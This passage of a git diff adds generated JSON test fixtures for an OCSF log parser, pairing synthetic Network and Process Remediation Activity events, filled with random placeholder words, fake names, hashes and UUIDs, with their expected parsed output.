\"activity_id\": 3, \"type_uid\": 700403, \"type_name\": \"Network Remediation Activity: Restore\", \"observables\": [{\"name\": \"catherine lawsuit wash\", \"type\": \"File Name\", \"value\": \"underwear img tp\", \"type_id\": 7}, {\"name\": \"drawn vol buy\", \"type\": \"Email Address\", \"type_id\": 5, \"reputation\": {\"base_score\": 40.1815, \"provider\": \"miscellaneous applying places\", \"score\": \"tapes\", \"score_id\": 99}}], \"category_name\": \"Remediation\", \"class_uid\": 7004, \"class_name\": \"Network Remediation Activity\", 
\"timezone_offset\": 96, \"activity_name\": \"Restore\", \"command_uid\": \"a3aecf68-a02f-11ef-b5f1-0242ac110007\", \"countermeasures\": [{\"version\": \"1.3.0\", \"d3f_tactic\": {\"uid\": \"a3ae8698-a02f-11ef-a4fc-0242ac110007\", \"src_url\": \"weak\"}, \"d3f_technique\": {\"name\": \"gratuit refused endorsed\", \"uid\": \"a3ae95ac-a02f-11ef-b756-0242ac110007\"}}], \"enrichments\": [{\"data\": \"year\", \"name\": \"terry acceptance unavailable\", \"type\": \"me mo fetish\", \"value\": \"ride restore bearing\", \"created_time\": 1731331194181, \"provider\": \"illinois ferrari samuel\", \"reputation\": {\"base_score\": 43.1915, \"provider\": \"view rankings um\", \"score\": \"Very Safe\", \"score_id\": 1}, \"short_desc\": \"uganda pose worse\", \"src_url\": \"aluminium\"}, {\"data\": \"funky\", \"name\": \"italic electrical successfully\", \"type\": \"ethnic hitachi stevens\", \"value\": \"steven m rogers\", \"desc\": \"digital jeffrey rogers\", \"created_time\": 1731331194181, \"short_desc\": \"cook psi jobs\", \"src_url\": \"hp\"}], \"severity_id\": 3, \"status_code\": \"professionals\", \"status_detail\": \"affiliated carries publications\", \"status_id\": 0}" + }, + "expected": { + "message": "{\"count\": 70, \"message\": \"virtue carb keeps\", \"status\": \"Unknown\", \"time\": 1731331194181, \"metadata\": {\"version\": \"1.3.0\", \"product\": {\"name\": \"subjective myself systems\", \"version\": \"1.3.0\", \"uid\": \"a3ac922a-a02f-11ef-984c-0242ac110007\", \"feature\": {\"name\": \"seafood zen attacks\", \"version\": \"1.3.0\", \"uid\": \"a3ad2ca8-a02f-11ef-a741-0242ac110007\"}, \"vendor_name\": \"sullivan participation wired\"}, \"extensions\": [{\"name\": \"faq valuable theory\", \"version\": \"1.3.0\", \"uid\": \"a3ad55ac-a02f-11ef-9d32-0242ac110007\"}, {\"name\": \"diesel salmon graduates\", \"version\": \"1.3.0\", \"uid\": \"a3ad70e6-a02f-11ef-be20-0242ac110007\"}], \"profiles\": [], \"log_name\": \"influence increasing towers\", \"log_provider\": 
\"defence ignore carroll\", \"original_time\": \"baths ends led\", \"tenant_uid\": \"a3ad8d56-a02f-11ef-a66b-0242ac110007\"}, \"scan\": {\"name\": \"fits educated vip\", \"type\": \"Attached Media\", \"uid\": \"a3ae1122-a02f-11ef-b0ef-0242ac110007\", \"type_id\": 5}, \"connection_info\": {\"uid\": \"a3ae3c42-a02f-11ef-bdd6-0242ac110007\", \"boundary\": \"Internet Gateway\", \"protocol_name\": \"nuts oriented data\", \"direction\": \"Inbound\", \"boundary_id\": 11, \"direction_id\": 1, \"protocol_num\": 88, \"protocol_ver\": \"Unknown\", \"protocol_ver_id\": 0}, \"severity\": \"Medium\", \"category_uid\": 7, \"activity_id\": 3, \"type_uid\": 700403, \"type_name\": \"Network Remediation Activity: Restore\", \"observables\": [{\"name\": \"catherine lawsuit wash\", \"type\": \"File Name\", \"value\": \"underwear img tp\", \"type_id\": 7}, {\"name\": \"drawn vol buy\", \"type\": \"Email Address\", \"type_id\": 5, \"reputation\": {\"base_score\": 40.1815, \"provider\": \"miscellaneous applying places\", \"score\": \"tapes\", \"score_id\": 99}}], \"category_name\": \"Remediation\", \"class_uid\": 7004, \"class_name\": \"Network Remediation Activity\", \"timezone_offset\": 96, \"activity_name\": \"Restore\", \"command_uid\": \"a3aecf68-a02f-11ef-b5f1-0242ac110007\", \"countermeasures\": [{\"version\": \"1.3.0\", \"d3f_tactic\": {\"uid\": \"a3ae8698-a02f-11ef-a4fc-0242ac110007\", \"src_url\": \"weak\"}, \"d3f_technique\": {\"name\": \"gratuit refused endorsed\", \"uid\": \"a3ae95ac-a02f-11ef-b756-0242ac110007\"}}], \"enrichments\": [{\"data\": \"year\", \"name\": \"terry acceptance unavailable\", \"type\": \"me mo fetish\", \"value\": \"ride restore bearing\", \"created_time\": 1731331194181, \"provider\": \"illinois ferrari samuel\", \"reputation\": {\"base_score\": 43.1915, \"provider\": \"view rankings um\", \"score\": \"Very Safe\", \"score_id\": 1}, \"short_desc\": \"uganda pose worse\", \"src_url\": \"aluminium\"}, {\"data\": \"funky\", \"name\": \"italic electrical 
successfully\", \"type\": \"ethnic hitachi stevens\", \"value\": \"steven m rogers\", \"desc\": \"digital jeffrey rogers\", \"created_time\": 1731331194181, \"short_desc\": \"cook psi jobs\", \"src_url\": \"hp\"}], \"severity_id\": 3, \"status_code\": \"professionals\", \"status_detail\": \"affiliated carries publications\", \"status_id\": 0}", + "event": { + "action": "restore", + "category": [], + "outcome": "unknown", + "provider": "defence ignore carroll", + "reason": "virtue carb keeps", + "severity": 3, + "type": [] + }, + "@timestamp": "2024-11-11T13:19:54.181000Z", + "network": { + "direction": [ + "inbound" + ], + "iana_number": "88" + }, + "ocsf": { + "activity_id": 3, + "activity_name": "Restore", + "class_name": "Network Remediation Activity", + "class_uid": 7004 + } + } +} \ No newline at end of file diff --git a/OCSF/ocsf/tests/generated_process_remediation_activity_1.json b/OCSF/ocsf/tests/generated_process_remediation_activity_1.json new file mode 100644 index 000000000..ac2f48c8a --- /dev/null +++ b/OCSF/ocsf/tests/generated_process_remediation_activity_1.json 
@@ -0,0 +1,78 @@ +{ + "input": { + "message": "{\"message\": \"heaven country sugar\", \"process\": {\"name\": \"Success\", \"pid\": 94, \"file\": {\"name\": \"earliest.pdb\", \"owner\": {\"name\": \"Tee\", \"type\": \"Unknown\", \"domain\": \"term assembled gossip\", \"uid\": \"223ad95e-a02f-11ef-8523-0242ac110007\", \"type_id\": 0, \"full_name\": \"Kaycee Valarie\", \"risk_level\": \"orleans medicines legal\"}, \"type\": \"Regular File\", \"path\": \"guilty different comply/expects.accdb/earliest.pdb\", \"desc\": \"prominent purse jones\", \"ext\": \"rendered ministry investigators\", \"type_id\": 1, \"parent_folder\": \"guilty different comply/expects.accdb\", \"hashes\": [{\"value\": \"EFE899C74558F20B08BBC19BF0228C0C25BDDB7871D80BD34AC8B33C030B3698\", \"algorithm\": \"SHA-256\", \"algorithm_id\": 3}, {\"value\": \"6B1C747BA410921F62727C6AEE307A71A7021A4F23DCD2CCFAB1EC037E3A86C28518C84FC4E389893A41ED6CC8EFCA276E1FA37D836A1183305EC8DD7BC3D3F0\", \"algorithm\": \"TLSH\", \"algorithm_id\": 6}]}, \"user\": {\"name\": \"Livestock\", \"type\": \"Admin\", \"uid\": \"223aed7c-a02f-11ef-943c-0242ac110007\", \"type_id\": 2, \"risk_level\": \"sense\", \"risk_level_id\": 99}, \"loaded_modules\": [\"/offered/her/msg/vegetarian/bizarre.html\", \"/principle/setting/liz/defendant/herself.wsf\"], \"cmd_line\": \"guided stretch phrases\", \"created_time\": 1731330976996, \"parent_process\": {\"name\": \"Em\", \"pid\": 60, \"file\": {\"name\": \"texas.rss\", \"type\": \"Regular File\", \"path\": \"pipeline memorabilia wednesday/lindsay.thm/texas.rss\", \"product\": {\"name\": \"rather rate cms\", \"version\": \"1.3.0\", \"uid\": \"223b1036-a02f-11ef-a666-0242ac110007\", \"lang\": \"en\", \"vendor_name\": \"assistance printers careful\"}, \"uid\": \"223b1766-a02f-11ef-b077-0242ac110007\", \"ext\": \"around clear funk\", \"type_id\": 1, \"parent_folder\": \"pipeline memorabilia wednesday/lindsay.thm\", \"accessed_time\": 1731330976998, \"hashes\": [{\"value\": 
\"0C9582BD64D9BAB6B4D907C275F45B5D3FC0035986E6294724E7FC4C77A9E16F42AD975BA9F5AD3884CCEFB2635640629F2AA538C5FDA52E2D872D3B73F65C6C\", \"algorithm\": \"quickXorHash\", \"algorithm_id\": 7}, {\"value\": \"31FEBEB59C135F276A56FF06D2A3B00B982685E2D8EF3205B97EB80E0F4DCDC3\", \"algorithm\": \"magic\", \"algorithm_id\": 99}], \"is_system\": true, \"xattributes\": {}}, \"user\": {\"name\": \"Membership\", \"type\": \"System\", \"uid\": \"223b30c0-a02f-11ef-87cb-0242ac110007\", \"type_id\": 3, \"full_name\": \"Anita Rosanna\", \"email_addr\": \"Li@scientific.travel\"}, \"uid\": \"223b4aa6-a02f-11ef-9d39-0242ac110007\", \"cmd_line\": \"suits chris sega\", \"created_time\": 1731330976999, \"lineage\": [\"alternative consistently improved\", \"cats charm hardcover\"], \"parent_process\": {\"name\": \"Humor\", \"pid\": 26, \"file\": {\"name\": \"incorrect.gadget\", \"type\": \"Regular File\", \"version\": \"1.3.0\", \"path\": \"upset india relax/marie.3gp/incorrect.gadget\", \"product\": {\"name\": \"grades internationally ordinary\", \"version\": \"1.3.0\", \"uid\": \"223b9d6c-a02f-11ef-af12-0242ac110007\", \"feature\": {\"name\": \"motivation bridges other\", \"version\": \"1.3.0\", \"uid\": \"223bade8-a02f-11ef-a579-0242ac110007\"}, \"vendor_name\": \"lightweight monday station\"}, \"uid\": \"223bb4f0-a02f-11ef-9470-0242ac110007\", \"ext\": \"celebrities intelligent david\", \"type_id\": 1, \"accessor\": {\"name\": \"Institutes\", \"type\": \"User\", \"uid\": \"223bc1b6-a02f-11ef-be06-0242ac110007\", \"org\": {\"uid\": \"223bcfee-a02f-11ef-9eaf-0242ac110007\", \"ou_name\": \"sixth rats hawk\"}, \"type_id\": 1, \"account\": {\"name\": \"fairy clause literally\", \"uid\": \"223be3a8-a02f-11ef-b63a-0242ac110007\"}, \"credential_uid\": \"223befc4-a02f-11ef-9ee4-0242ac110007\", \"ldap_person\": {\"email_addrs\": [\"Suzann@verbal.biz\", \"Flo@submissions.int\"], \"last_login_time\": 1731330977003, \"leave_time\": 1731330977003}, \"risk_level\": \"Critical\", \"risk_level_id\": 4, 
\"risk_score\": 44}, \"parent_folder\": \"upset india relax/marie.3gp\", \"hashes\": [{\"value\": \"4B300F704B4BD8E100BDB3CAB1031A6CEDCB68FBC2C3606B1178586034AF4ECAC9A514E1A67728708F5FAD5AD1FC04AE78ECA412443352AF94457FEC9581ED11\", \"algorithm\": \"Unknown\", \"algorithm_id\": 0}, {\"value\": \"C861DBBC3D16CC0E2D8C34764F0864239EBAC9973B25229B5ADFE56574C851ED73B6FCBC5931C8F0E23094B0D787E183BF5DF893560460CD403ED6F6C7174B7D\", \"algorithm\": \"quickXorHash\", \"algorithm_id\": 7}]}, \"user\": {\"name\": \"Protection\", \"type\": \"Unknown\", \"uid\": \"223c0d88-a02f-11ef-bfe0-0242ac110007\", \"type_id\": 0, \"full_name\": \"Brittanie Russel\", \"credential_uid\": \"223c156c-a02f-11ef-ae21-0242ac110007\", \"risk_level\": \"school wall wolf\", \"risk_score\": 37}, \"cmd_line\": \"roof dt critical\", \"created_time\": 1731330977004, \"parent_process\": {\"name\": \"Iv\", \"file\": {\"name\": \"retro.bmp\", \"type\": \"Named Pipe\", \"path\": \"rubber mj queen/archive.wav/retro.bmp\", \"signature\": {\"state\": \"lauderdale illustrated editorial\", \"certificate\": {\"version\": \"1.3.0\", \"subject\": \"mighty assisted detail\", \"issuer\": \"accompanied routers acne\", \"fingerprints\": [{\"value\": \"022DEC95C5096AFDD20A88DF019AC56B\", \"algorithm\": \"MD5\", \"algorithm_id\": 1}, {\"value\": \"8418E7362D4E0848D22B88FF2EC86F93AB49AE75A1558CE41B75732C6B78955A\", \"algorithm\": \"magic\", \"algorithm_id\": 99}], \"created_time\": 1731330977005, \"expiration_time\": 1731330977005, \"serial_number\": \"receivers stylish woods\"}, \"algorithm\": \"Unknown\", \"algorithm_id\": 0}, \"desc\": \"rep jeff tape\", \"ext\": \"through testimonials cardiff\", \"type_id\": 6, \"parent_folder\": \"rubber mj queen/archive.wav\", \"accessed_time\": 1731330977005, \"hashes\": [{\"value\": \"311EF3B8DC9FFBC403CA8BFEFAF69F728D2BE1AFFB42206E860CAA9F9FC9D8A57266E69AF264348CFACF811255655CDAF7BF4204EA0E7C0AD91297FCCB92BD28\", \"algorithm\": \"TLSH\", \"algorithm_id\": 6}, {\"value\": 
\"12B400C07544526379365632C5EAE7B868347EA513F21C09D8F5A9306B373005\", \"algorithm\": \"magic\", \"algorithm_id\": 99}]}, \"user\": {\"name\": \"Rise\", \"type\": \"omissions\", \"uid\": \"223c3c36-a02f-11ef-a7a3-0242ac110007\", \"type_id\": 99, \"account\": {\"name\": \"naturally textile pharmacies\", \"uid\": \"223c4b7c-a02f-11ef-90fb-0242ac110007\"}}, \"uid\": \"223c51e4-a02f-11ef-8de3-0242ac110007\", \"cmd_line\": \"keyboard milk printers\", \"created_time\": 1731330977006, \"parent_process\": {\"name\": \"Computation\", \"pid\": 30, \"file\": {\"name\": \"posted.yuv\", \"type\": \"Folder\", \"path\": \"kid hollow housing/trick.dwg/posted.yuv\", \"ext\": \"gage capabilities reasons\", \"type_id\": 2, \"accessor\": {\"type\": \"User\", \"uid\": \"223c6ed6-a02f-11ef-9e28-0242ac110007\", \"org\": {\"name\": \"salem civil rely\", \"uid\": \"223c784a-a02f-11ef-b6f3-0242ac110007\", \"ou_name\": \"saudi kathy going\"}, \"type_id\": 1, \"credential_uid\": \"223c7f2a-a02f-11ef-9b2e-0242ac110007\"}, \"parent_folder\": \"kid hollow housing/trick.dwg\", \"accessed_time\": 1731330977007, \"hashes\": [{\"value\": \"84282F14696FCE92F1387E783E6E35A7F462B8F63DD2CBBF03C8FBD817B4B334EA21DB328F7F7CC7040EBAEC27B5E741457DFC36FAEC09CB527ECE2B22C142C4\", \"algorithm\": \"Unknown\", \"algorithm_id\": 0}, {\"value\": \"A74A78AF4E994F8C5ADE1098C677DEE43370A2B898524B0730EBFF42FA2C8359\", \"algorithm\": \"magic\", \"algorithm_id\": 99}], \"is_system\": false}, \"user\": {\"name\": \"Royal\", \"type\": \"eclipse\", \"uid\": \"223c92ee-a02f-11ef-b37d-0242ac110007\", \"org\": {\"name\": \"races obtaining business\", \"uid\": \"223c9f6e-a02f-11ef-80ed-0242ac110007\", \"ou_name\": \"larger phones hotel\", \"ou_uid\": \"223ca72a-a02f-11ef-b597-0242ac110007\"}, \"type_id\": 99, \"account\": {\"name\": \"execution implemented contributions\", \"type\": \"AWS Account\", \"uid\": \"223cb300-a02f-11ef-a109-0242ac110007\", \"type_id\": 10}, \"ldap_person\": {\"location\": {\"desc\": \"Senegal, Republic 
of\", \"city\": \"Barely vpn\", \"country\": \"SN\", \"coordinates\": [-6.1769, -23.2664], \"continent\": \"Africa\"}, \"given_name\": \"oven registrar consultant\", \"ldap_cn\": \"insulin convicted posted\", \"modified_time\": 1731330977010}}, \"tid\": 28, \"uid\": \"223d09cc-a02f-11ef-88a8-0242ac110007\", \"cmd_line\": \"cologne preventing pvc\", \"created_time\": 1731330977010, \"integrity\": \"tears\", \"integrity_id\": 99, \"parent_process\": {\"pid\": 58, \"file\": {\"name\": \"concept.tar\", \"type\": \"Regular File\", \"path\": \"aging socks soc/traditions.nes/concept.tar\", \"modifier\": {\"name\": \"Mai\", \"type\": \"mineral\", \"uid\": \"223d2b96-a02f-11ef-a466-0242ac110007\", \"type_id\": 99, \"account\": {\"name\": \"fitting remembered advertiser\", \"type\": \"Linux Account\", \"uid\": \"223d378a-a02f-11ef-a93b-0242ac110007\", \"type_id\": 9}, \"credential_uid\": \"223d4086-a02f-11ef-aae8-0242ac110007\", \"risk_level\": \"Low\", \"risk_level_id\": 1, \"uid_alt\": \"chevrolet header sensitive\"}, \"uid\": \"223d47d4-a02f-11ef-80dd-0242ac110007\", \"ext\": \"finnish quotations trigger\", \"type_id\": 1, \"parent_folder\": \"aging socks soc/traditions.nes\", \"hashes\": [{\"value\": \"CCF8B7F3C1B91940CEA0982813BDECBB4177E02F8485991FF6F5F1ED5AEB7448BB931BD088B4617001768303ECEE51E3D61A3CC7369BA9EEF3C965E865EFEA4A\", \"algorithm\": \"quickXorHash\", \"algorithm_id\": 7}]}, \"user\": {\"name\": \"Clubs\", \"type\": \"Unknown\", \"uid\": \"223d59ae-a02f-11ef-8620-0242ac110007\", \"type_id\": 0, \"risk_score\": 1, \"uid_alt\": \"quebec robertson slovak\"}, \"tid\": 22, \"uid\": \"223d673c-a02f-11ef-9f3c-0242ac110007\", \"cmd_line\": \"barnes outlined alabama\", \"created_time\": 1731330977013, \"parent_process\": {\"name\": \"Weapons\", \"pid\": 16, \"file\": {\"name\": \"pale.odt\", \"owner\": {\"name\": \"Waiver\", \"type\": \"carroll\", \"type_id\": 99, \"risk_level\": \"Critical\", \"risk_level_id\": 4, \"risk_score\": 13}, \"type\": \"Character Device\", 
\"path\": \"pupils demonstrated spam/constitution.obj/pale.odt\", \"ext\": \"intl hip entry\", \"type_id\": 3, \"company_name\": \"Lucas Emerald\", \"parent_folder\": \"pupils demonstrated spam/constitution.obj\", \"hashes\": [{\"value\": \"8DF60FF96BFECD59DE3F802675A05912\", \"algorithm\": \"MD5\", \"algorithm_id\": 1}, {\"value\": \"149D479F6A59E992D99E894B589A22B63E7F357049D6B573DA7AAD6DB5584F44\", \"algorithm\": \"SHA-256\", \"algorithm_id\": 3}], \"security_descriptor\": \"decade prepared deleted\", \"xattributes\": {}}, \"user\": {\"name\": \"Gbp\", \"domain\": \"cathedral faces lovers\", \"uid\": \"223dc06a-a02f-11ef-8a14-0242ac110007\", \"full_name\": \"Bryan Yasmine\", \"risk_score\": 94}, \"uid\": \"223dc7f4-a02f-11ef-850b-0242ac110007\", \"cmd_line\": \"religious membership rb\", \"created_time\": 1731330977015, \"parent_process\": {\"name\": \"Invite\", \"pid\": 19, \"file\": {\"name\": \"aggressive.icns\", \"type\": \"Block Device\", \"path\": \"nyc runtime slip/ballot.thm/aggressive.icns\", \"desc\": \"ease ill executed\", \"ext\": \"malpractice road end\", \"type_id\": 4, \"mime_type\": \"income/poison\", \"parent_folder\": \"nyc runtime slip/ballot.thm\", \"hashes\": [{\"value\": \"037AEAEAF4BBF26DDABE7256A8294DC52DA48D575A1247B5C2598C47DE7AEBAB\", \"algorithm\": \"SHA-256\", \"algorithm_id\": 3}, {\"value\": \"C63B81E57E6869E3358411F7CCE3A2FA7BBE6FE5C1C54E3B4FDCD214F77082948C4A05C49CF7AF90CB5D0F112840C2A2B7715C80A07CF8511D608E1546DB6AC1\", \"algorithm\": \"quickXorHash\", \"algorithm_id\": 7}], \"modified_time\": 1731330977016}, \"user\": {\"type\": \"User\", \"uid\": \"223decca-a02f-11ef-ab3c-0242ac110007\", \"type_id\": 1, \"ldap_person\": {\"cost_center\": \"motion saudi unix\", \"deleted_time\": 1731330977016, \"employee_uid\": \"223df7ba-a02f-11ef-8947-0242ac110007\", \"hire_time\": 1731330977016, \"last_login_time\": 1731330977016, \"ldap_dn\": \"table silent possibly\", \"surname\": \"alone tongue emotional\"}, \"risk_level\": \"Low\", 
\"risk_level_id\": 1}, \"uid\": \"223dff76-a02f-11ef-b8d3-0242ac110007\", \"loaded_modules\": [\"/penguin/celebration/epson/lenders/with.uue\", \"/prefer/motherboard/traveling/factors/lawyer.tmp\"], \"cmd_line\": \"except routing crowd\", \"created_time\": 1731330977017, \"sandbox\": \"mechanisms suppose founded\"}}, \"sandbox\": \"tide oral independent\"}}}, \"terminated_time\": 1731330977017}}, \"xattributes\": {}}, \"status\": \"Unknown\", \"time\": 1731330976994, \"metadata\": {\"version\": \"1.3.0\", \"product\": {\"name\": \"appeals discrete crash\", \"version\": \"1.3.0\", \"uid\": \"223a5696-a02f-11ef-ac80-0242ac110007\", \"vendor_name\": \"license push emperor\"}, \"sequence\": 26, \"profiles\": [], \"log_name\": \"ideal extended offers\", \"log_provider\": \"seller deserve sharing\", \"original_time\": \"alfred invitations speaking\", \"tenant_uid\": \"223a5fec-a02f-11ef-af39-0242ac110007\"}, \"severity\": \"Critical\", \"category_uid\": 7, \"activity_id\": 4, \"type_uid\": 700304, \"type_name\": \"Process Remediation Activity: Harden\", \"observables\": [{\"name\": \"uploaded bear will\", \"type\": \"Subnet\", \"type_id\": 12}, {\"name\": \"italic quantitative keno\", \"type\": \"Geo Location\", \"type_id\": 26}], \"category_name\": \"Remediation\", \"class_uid\": 7003, \"class_name\": \"Process Remediation Activity\", \"timezone_offset\": 64, \"activity_name\": \"Harden\", \"command_uid\": \"223ab6e0-a02f-11ef-9ffc-0242ac110007\", \"countermeasures\": [{\"version\": \"1.3.0\", \"d3f_tactic\": {\"uid\": \"223a6fdc-a02f-11ef-a601-0242ac110007\"}, \"d3f_technique\": {\"name\": \"columbus sync taken\", \"uid\": \"223a80c6-a02f-11ef-9766-0242ac110007\"}}], \"enrichments\": [{\"data\": \"trackback\", \"name\": \"natural segment seattle\", \"value\": \"rebecca stack obtain\", \"created_time\": 1731330976994, \"provider\": \"shall surplus transparency\", \"reputation\": {\"base_score\": 63.125, \"provider\": \"czech meter kinda\", \"score\": \"Possibly 
Malicious\", \"score_id\": 8}, \"src_url\": \"employees\"}, {\"data\": \"academics\", \"name\": \"todd earliest quick\", \"type\": \"older complicated mails\", \"value\": \"issued dressed latina\", \"created_time\": 1731330976994, \"provider\": \"tube subtle austin\", \"short_desc\": \"summer concentration specific\", \"src_url\": \"domestic\"}], \"severity_id\": 5, \"status_code\": \"malawi\", \"status_detail\": \"odd lib station\", \"status_id\": 0}" + }, + "expected": { + "message": "{\"message\": \"heaven country sugar\", \"process\": {\"name\": \"Success\", \"pid\": 94, \"file\": {\"name\": \"earliest.pdb\", \"owner\": {\"name\": \"Tee\", \"type\": \"Unknown\", \"domain\": \"term assembled gossip\", \"uid\": \"223ad95e-a02f-11ef-8523-0242ac110007\", \"type_id\": 0, \"full_name\": \"Kaycee Valarie\", \"risk_level\": \"orleans medicines legal\"}, \"type\": \"Regular File\", \"path\": \"guilty different comply/expects.accdb/earliest.pdb\", \"desc\": \"prominent purse jones\", \"ext\": \"rendered ministry investigators\", \"type_id\": 1, \"parent_folder\": \"guilty different comply/expects.accdb\", \"hashes\": [{\"value\": \"EFE899C74558F20B08BBC19BF0228C0C25BDDB7871D80BD34AC8B33C030B3698\", \"algorithm\": \"SHA-256\", \"algorithm_id\": 3}, {\"value\": \"6B1C747BA410921F62727C6AEE307A71A7021A4F23DCD2CCFAB1EC037E3A86C28518C84FC4E389893A41ED6CC8EFCA276E1FA37D836A1183305EC8DD7BC3D3F0\", \"algorithm\": \"TLSH\", \"algorithm_id\": 6}]}, \"user\": {\"name\": \"Livestock\", \"type\": \"Admin\", \"uid\": \"223aed7c-a02f-11ef-943c-0242ac110007\", \"type_id\": 2, \"risk_level\": \"sense\", \"risk_level_id\": 99}, \"loaded_modules\": [\"/offered/her/msg/vegetarian/bizarre.html\", \"/principle/setting/liz/defendant/herself.wsf\"], \"cmd_line\": \"guided stretch phrases\", \"created_time\": 1731330976996, \"parent_process\": {\"name\": \"Em\", \"pid\": 60, \"file\": {\"name\": \"texas.rss\", \"type\": \"Regular File\", \"path\": \"pipeline memorabilia 
wednesday/lindsay.thm/texas.rss\", \"product\": {\"name\": \"rather rate cms\", \"version\": \"1.3.0\", \"uid\": \"223b1036-a02f-11ef-a666-0242ac110007\", \"lang\": \"en\", \"vendor_name\": \"assistance printers careful\"}, \"uid\": \"223b1766-a02f-11ef-b077-0242ac110007\", \"ext\": \"around clear funk\", \"type_id\": 1, \"parent_folder\": \"pipeline memorabilia wednesday/lindsay.thm\", \"accessed_time\": 1731330976998, \"hashes\": [{\"value\": \"0C9582BD64D9BAB6B4D907C275F45B5D3FC0035986E6294724E7FC4C77A9E16F42AD975BA9F5AD3884CCEFB2635640629F2AA538C5FDA52E2D872D3B73F65C6C\", \"algorithm\": \"quickXorHash\", \"algorithm_id\": 7}, {\"value\": \"31FEBEB59C135F276A56FF06D2A3B00B982685E2D8EF3205B97EB80E0F4DCDC3\", \"algorithm\": \"magic\", \"algorithm_id\": 99}], \"is_system\": true, \"xattributes\": {}}, \"user\": {\"name\": \"Membership\", \"type\": \"System\", \"uid\": \"223b30c0-a02f-11ef-87cb-0242ac110007\", \"type_id\": 3, \"full_name\": \"Anita Rosanna\", \"email_addr\": \"Li@scientific.travel\"}, \"uid\": \"223b4aa6-a02f-11ef-9d39-0242ac110007\", \"cmd_line\": \"suits chris sega\", \"created_time\": 1731330976999, \"lineage\": [\"alternative consistently improved\", \"cats charm hardcover\"], \"parent_process\": {\"name\": \"Humor\", \"pid\": 26, \"file\": {\"name\": \"incorrect.gadget\", \"type\": \"Regular File\", \"version\": \"1.3.0\", \"path\": \"upset india relax/marie.3gp/incorrect.gadget\", \"product\": {\"name\": \"grades internationally ordinary\", \"version\": \"1.3.0\", \"uid\": \"223b9d6c-a02f-11ef-af12-0242ac110007\", \"feature\": {\"name\": \"motivation bridges other\", \"version\": \"1.3.0\", \"uid\": \"223bade8-a02f-11ef-a579-0242ac110007\"}, \"vendor_name\": \"lightweight monday station\"}, \"uid\": \"223bb4f0-a02f-11ef-9470-0242ac110007\", \"ext\": \"celebrities intelligent david\", \"type_id\": 1, \"accessor\": {\"name\": \"Institutes\", \"type\": \"User\", \"uid\": \"223bc1b6-a02f-11ef-be06-0242ac110007\", \"org\": {\"uid\": 
\"223bcfee-a02f-11ef-9eaf-0242ac110007\", \"ou_name\": \"sixth rats hawk\"}, \"type_id\": 1, \"account\": {\"name\": \"fairy clause literally\", \"uid\": \"223be3a8-a02f-11ef-b63a-0242ac110007\"}, \"credential_uid\": \"223befc4-a02f-11ef-9ee4-0242ac110007\", \"ldap_person\": {\"email_addrs\": [\"Suzann@verbal.biz\", \"Flo@submissions.int\"], \"last_login_time\": 1731330977003, \"leave_time\": 1731330977003}, \"risk_level\": \"Critical\", \"risk_level_id\": 4, \"risk_score\": 44}, \"parent_folder\": \"upset india relax/marie.3gp\", \"hashes\": [{\"value\": \"4B300F704B4BD8E100BDB3CAB1031A6CEDCB68FBC2C3606B1178586034AF4ECAC9A514E1A67728708F5FAD5AD1FC04AE78ECA412443352AF94457FEC9581ED11\", \"algorithm\": \"Unknown\", \"algorithm_id\": 0}, {\"value\": \"C861DBBC3D16CC0E2D8C34764F0864239EBAC9973B25229B5ADFE56574C851ED73B6FCBC5931C8F0E23094B0D787E183BF5DF893560460CD403ED6F6C7174B7D\", \"algorithm\": \"quickXorHash\", \"algorithm_id\": 7}]}, \"user\": {\"name\": \"Protection\", \"type\": \"Unknown\", \"uid\": \"223c0d88-a02f-11ef-bfe0-0242ac110007\", \"type_id\": 0, \"full_name\": \"Brittanie Russel\", \"credential_uid\": \"223c156c-a02f-11ef-ae21-0242ac110007\", \"risk_level\": \"school wall wolf\", \"risk_score\": 37}, \"cmd_line\": \"roof dt critical\", \"created_time\": 1731330977004, \"parent_process\": {\"name\": \"Iv\", \"file\": {\"name\": \"retro.bmp\", \"type\": \"Named Pipe\", \"path\": \"rubber mj queen/archive.wav/retro.bmp\", \"signature\": {\"state\": \"lauderdale illustrated editorial\", \"certificate\": {\"version\": \"1.3.0\", \"subject\": \"mighty assisted detail\", \"issuer\": \"accompanied routers acne\", \"fingerprints\": [{\"value\": \"022DEC95C5096AFDD20A88DF019AC56B\", \"algorithm\": \"MD5\", \"algorithm_id\": 1}, {\"value\": \"8418E7362D4E0848D22B88FF2EC86F93AB49AE75A1558CE41B75732C6B78955A\", \"algorithm\": \"magic\", \"algorithm_id\": 99}], \"created_time\": 1731330977005, \"expiration_time\": 1731330977005, \"serial_number\": \"receivers 
stylish woods\"}, \"algorithm\": \"Unknown\", \"algorithm_id\": 0}, \"desc\": \"rep jeff tape\", \"ext\": \"through testimonials cardiff\", \"type_id\": 6, \"parent_folder\": \"rubber mj queen/archive.wav\", \"accessed_time\": 1731330977005, \"hashes\": [{\"value\": \"311EF3B8DC9FFBC403CA8BFEFAF69F728D2BE1AFFB42206E860CAA9F9FC9D8A57266E69AF264348CFACF811255655CDAF7BF4204EA0E7C0AD91297FCCB92BD28\", \"algorithm\": \"TLSH\", \"algorithm_id\": 6}, {\"value\": \"12B400C07544526379365632C5EAE7B868347EA513F21C09D8F5A9306B373005\", \"algorithm\": \"magic\", \"algorithm_id\": 99}]}, \"user\": {\"name\": \"Rise\", \"type\": \"omissions\", \"uid\": \"223c3c36-a02f-11ef-a7a3-0242ac110007\", \"type_id\": 99, \"account\": {\"name\": \"naturally textile pharmacies\", \"uid\": \"223c4b7c-a02f-11ef-90fb-0242ac110007\"}}, \"uid\": \"223c51e4-a02f-11ef-8de3-0242ac110007\", \"cmd_line\": \"keyboard milk printers\", \"created_time\": 1731330977006, \"parent_process\": {\"name\": \"Computation\", \"pid\": 30, \"file\": {\"name\": \"posted.yuv\", \"type\": \"Folder\", \"path\": \"kid hollow housing/trick.dwg/posted.yuv\", \"ext\": \"gage capabilities reasons\", \"type_id\": 2, \"accessor\": {\"type\": \"User\", \"uid\": \"223c6ed6-a02f-11ef-9e28-0242ac110007\", \"org\": {\"name\": \"salem civil rely\", \"uid\": \"223c784a-a02f-11ef-b6f3-0242ac110007\", \"ou_name\": \"saudi kathy going\"}, \"type_id\": 1, \"credential_uid\": \"223c7f2a-a02f-11ef-9b2e-0242ac110007\"}, \"parent_folder\": \"kid hollow housing/trick.dwg\", \"accessed_time\": 1731330977007, \"hashes\": [{\"value\": \"84282F14696FCE92F1387E783E6E35A7F462B8F63DD2CBBF03C8FBD817B4B334EA21DB328F7F7CC7040EBAEC27B5E741457DFC36FAEC09CB527ECE2B22C142C4\", \"algorithm\": \"Unknown\", \"algorithm_id\": 0}, {\"value\": 